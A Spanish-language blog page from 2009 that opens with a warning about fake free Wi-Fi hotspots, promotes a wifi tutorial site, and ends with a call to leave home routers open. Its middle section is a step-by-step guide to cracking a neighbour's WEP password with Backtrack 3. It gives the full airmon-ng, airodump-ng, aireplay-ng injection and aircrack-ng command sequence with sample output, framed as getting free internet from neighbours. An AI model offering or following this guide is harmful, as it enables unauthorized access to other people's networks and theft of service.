lunes, 13 de julio de 2009

En las vacaciones, ¡Cuidado con las “Wi-fi gratis!


Una nueva moda se está extendiendo entre los ciberdilencuentes: simular puntos de acceso Wi-fi cuando en realidad se tratan de redes privadas fraudulentas creadas con el único objetivo de saquear información privada del usuario que se conecta.

Así lo atestigua la última alerta emitida por la firma española de seguridad informática Ontinet.com ante el inicio del periodo vacacional.

Según esplica la compañía, el sistema utilizado no es nada complicado: los delincuentes, armados con un portátil con capacidades de conexión inalámbrica, configuran una conexión “punto a punto” a la que dan un nombre llamativo que atraiga al usuario necesitado de una conexión a Internet. Una vez conectado, el agresor puede tener acceso a los datos del usuario o solicitarle, mediante la creación de una página Web que simula ser la de un proveedor de acceso, los datos de su tarjeta de crédito.

Los proveedores de Internet ofrecen conexiones a través de puntos de acceso. Éstas se muestran con un icono distinto al de las conexiones “punto a punto”. Los delincuentes evitan que el usuario repare en esta diferencia empleando reclamos como “conexión gratis” para hacerles caer en la trampa.

Imagen

Este tipo de conexiones pueden distinguirse muy fácilmente:

- El icono mostrado es de una conexión “punto a punto” o “equipo a equipo”, en lugar de uno de punto de acceso. A los puntos de acceso se les puede reconocer por una pequeña antena, mientras que en las conexiones “equipo a equipo” se identifican con dos ordenadores.

- Las conexiones “equipo a equipo” y los puntos de acceso que no son públicos suelen incorporar algún tipo de seguridad, cifrando los datos para evitar que sean interceptados por extraños. Una conexión “equipo a equipo” sin clave es claramente insegura, y su uso supone un riesgo a evitar por todos los medios.

“Basta con pasearse por un aeropuerto, una estación o un centro de vacaciones para poder detectar este tipo de redes. Su uso es frecuente dado que si se está fuera del entorno habitual y se necesita de manera urgente una conexión, es muy fácil picar y ser estafado”, señala Fernando de la Cuadra, director de Educación de Ontinet.com.

“Las soluciones antivirus pueden evitar que los usuarios reciban códigos maliciosos, pero no pueden frenar un comportamiento arriesgado del usuario en caso de que esté empeñado en conectarse a este tipo de redes”, añade De la Cuadra, que sugiere “no bajar la guardia y nunca conectarse a una red punto a punto sin conocer perfectamente el otro ordenador con el que se establece la conexión”.

En resumidas cuentas, ten cuidado donde ingresas tus contraseñas, como siempre, cambialas de vez en cuando, en modo rotativo.

Redes Inalambricas Wifi, Tutoriales y Manuales sobre redes Wifi

Redes Inalambricas WiFi es un portal que contiene tutoriales, hardware, cursos y video tutoriales entre otra gran variedad de recursos sobre todas las áreas relacionadas con las redes inalambricas WiFi. En este sitio podrás encontrar recursos clasificados y organizados por temática y contenido sobre tecnologías inalámbrica y en concreto sobre redes wifi.redes inalambricas wifi

La Seguridad en Redes inalambricas WiFi también ocupa un papel importante en este directorio, en él podrás encontrar una clasificación exhaustiva de todos los manuales y video tutoriales relacionados con la seguridad wireless, incluyendo su defensa y técnicas de hacking ético de ataques WEP y WPA que te permitirán estar informado en contra de todos esos vecinos que intentan robarte tu conexión . Las redes inalambricas wifi forman hoy día un papel importante en nuestras vidas, desde la inclusión del estándar 802.11 en nuestras vidas con la certificación WiFi, las redes inalambricas wifi están en nuestros hogares, trabajo, lugares públicos... Por esta razón es importante conocer dichas tecnologías, así sus debilidades y sus fortalezas, la movidad y la seguridad de redes inalambricas wifi es un factor a tener en cuenta hoy en día.

En la sección de videos, podréis encontrar gran variedad de tutoriales sobre seguridad en redes inalambricas wifi, video tutoriales sobre aircrack, wifislax, wifiway backtrack, entre otras distribuciones de seguridad wifi, orientados a la auditoría de redes wifi.


Esta informacion se amplia en http://www.manual-wifi.com

Internet WiFI gratis de tus vecinos con Backtrack


Esta es una guía para conseguir la claves wep de los puntos wifi protegidos con contraseña usando una distribución de linux llamada Backtrack 3 que instalaremos en un pendrive.
Aquí teneis el manual.

Funciona perfectamente, se puede conseguir el password del internet de tu vecino en menos de 20 minutos.

¿Empezamos?

Requisitos previos:

Necesitaremos el Backtrack 3 versión USB: Descargar desde aqui.
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:

En windows vamos al menu de inicio > ejecutar > cmd

Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.

Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).

Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.

Bien, ahora empieza lo divertido…

Enchufamos el pendrive en el lado izquierdo del eee, no se porqué pero vá mejor.

Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc.

Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).

Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para “acojonar” luego es bastante facil.

Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.

PASO 1:

NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.

En una terminal pones:

airmon-ng start wifi0

a continuación:

airodump-ng ath1

uando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes

airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1

donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.

PASO 2:

Abre una nueva terminal, ya sabes como…

aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

donde:

[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.

Si te sale esto felicidades:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Si no, intenta con lo siguiente:

Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

Y te debería salir algo como esto:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Si no, olvidate.

Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas…

PASO 3:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezarás a ver como
la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).

Espera hata tener unos 40.000 más o menos y abre una tercera terminal.

PASO 4:

Quiero mi clave yaaaarl!!!

aircrack-ng -z -b [AP MAC] [filename*.cap]

En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.

Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.


Enlaces de Paginas Webs de interes para mi.








www.MotoGranada.com
www.ClubSlotAndalucia.com
www.CaseriaDeMontijo.com
Esta ultima direccion seria interesante ponerla en nuestro router para que el que lo vea pueda consultar este blog y ver accesos gratuitos.
http://internet-hotspot.blogspot.com

Internet libre por todos

Buenos, aquí estoy para empezar un proyecto en el cual podéis participar todos los que queráis, si todos los que queráis y tengáis Internet en casa con un router Wi-Fi.

La idea inicial es que todos dejemos el router nuestro de casa o del trabajo, sin clave para el acceso libre de cualquiera que quiera, acordaros de quitar la carpetas que comparte Windows por defecto o si le habéis dado permiso para compartir vosotros, o protegerlas con contraseña para visualización o control total sobre ella, como prefieras, si deseas compartir algún tipo de archivo lo dejas en esa carpeta y listo.

Recordar que el usuario por defecto que trae el router cambiarlo para que nadie manipule dentro de el sin permiso, en caso de hacerlo con un reset será suficiente, para dejarlo a su estado inicial.


Continuaremos con vuestro consejo en comentarios actualizando esto para que funcione realmente este proyecto que a todos nos gustaría que funcionara de verdad.


Saludos a todos, por un internet libre.